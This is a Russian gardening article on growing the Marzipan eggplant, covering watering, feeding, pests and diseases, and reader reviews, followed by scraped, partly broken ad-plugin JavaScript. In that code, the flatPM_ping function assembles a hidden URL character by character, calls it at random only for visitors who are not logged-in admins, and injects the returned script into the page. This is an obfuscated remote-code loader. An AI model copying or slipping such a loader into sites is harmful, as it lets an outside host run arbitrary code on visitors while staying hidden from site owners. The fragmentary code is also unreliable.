
Полив

Для данного сорта идеально использовать капельную систему полива. Если такая система не предусмотрена, полив осуществляют только под корень. Попадая на листья, влага может спровоцировать солнечный ожог растения.

В нежаркую погоду баклажаны достаточно поливать каждые 3-4 дня. Во время жары поливы учащают. Вода не должна быть холодной, иначе кусты могут сбросить цветы и завязи.

Поливать растения нужно ранним утром или после захода солнца. После каждого увлажнения почвы рекомендуется проводить рыхление. Грунт вспушивают поверхностно, чтобы не повредить корневую систему баклажанов.

Подкормки

Если почва для выращивания рассады была подобрана правильно, первый подкорм вводят уже в открытом грунте. Оптимальное время для первого внесения удобрений – месяц после высадки кустов на грядки.

Марципан удобряют по следующей схеме:

Период Удобрение Дозировка на 1 ведро воды
Цветение Органика + минералы Смесь мочевины (1 ч. л.) с сульфатом калия (1 ч. л.) и суперфосфатом (1 ст. л.)
Плодоношение Минералы Смесь суперфосфата (2 ч. л.) и калийной соли (2 ч. л.)

Правильная организация подкорма – очень важный момент при выращивании Марципана. Неправильно внесенные удобрения или их отсутствие приводят к искажению угла роста листьев, выцветанию зеленой массы, образованию коричневых пятен на листьях.

Борьба с вредителями и болезнями

Баклажаны очень любят подъедать колорадские жуки и слизни. Если растения вовремя не избавить от вредителей, они могут погибнуть. В одиноких случаях заражения «оккупантов» собирают вручную и уничтожают. Если заражение носит массовый характер, с вредителями борются при помощи инсектицида.

Неправильно организованный уход может спровоцировать развитие гнили. Обычно баклажаны поражает серая и белая гниль. При первых признаках болезни кусты следует обработать раствором фунгицида.

Баклажаны могут подвергаться заражению фузариозом, фитофторозом, вирусом мозаики. Это очень серьезные заболевания. Вылечить растение удается не всегда. Зачастую такие кусты подлежат уничтожению.

Отзывы о выращивании рассады баклажанов Марципан

Овощеводы, имеющие опыт выращивания Марципана, делятся своими впечатлениями о сорте, оставляя отзывы:

Ludmila62: «Марципан очень вкусный, но требует особых условий выращивания. Покупала семена фирмы «Семена НК». В пакетике за 16 руб. было 35 семечек. Всхожесть меня порадовала. С рассадой проблем вообще не было. Они начались после высадки в открытый грунт. В то лето 2 недели подряд шли проливные дожди. И мои цветущие красавцы-кустики стали жертвами корневой гнили.

Все растения были спасены, но на это ушло около 2-х недель. Драгоценное время было упущено. Лето уже заканчивалось, и мне удалось собрать только по нескольку плодов с каждого кустика. Баклажаны выросли отменными: красивые, большие и вкусные. А вот к фирме, выпускающей семена, у меня есть претензии. На пакетике следовало указать, что сорт не устойчив к ряду заболеваний. В следующем сезоне планирую повторить опыт с Марципаном. Но сажать его буду в поликарбонатную теплицу».

Esme: «Огородничеством занимаюсь давно. Все мои баклажаны растут на открытых участках без укрытия. Марципан уже выращивала. Урожайность хорошая, чуть ниже высокой. Возможно, она была бы выше под пленочным укрытием. Плоды фиолетовые, «мордастенькие». Мякоть не горчит».

Лана: «У Марципана крупные и красивые плоды. Я собирала баклажаны вплоть до начала заморозков. Урожайность средняя, но мне ее хватило».

Оля: «Высаживала в открытом грунте много сортов баклажанов, среди них и Марципан. Результатом осталась не очень довольна. В следующем году сажать его не буду».

TagetesRita: «Выращивала этот сорт в теплице вместе с перцами и базиликом. Он меня устраивает и по вкусу, и по степени плодоношения. С выращиванием проблем не было: всходы появились рано, рассада получилась крепкая».

Марципан считается одним из наиболее успешных гибридов баклажана. Он характеризуется универсальностью. Условия выращивания и ухода за Марципаном имеют некоторые отличия от основных стандартов культивирования баклажана.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};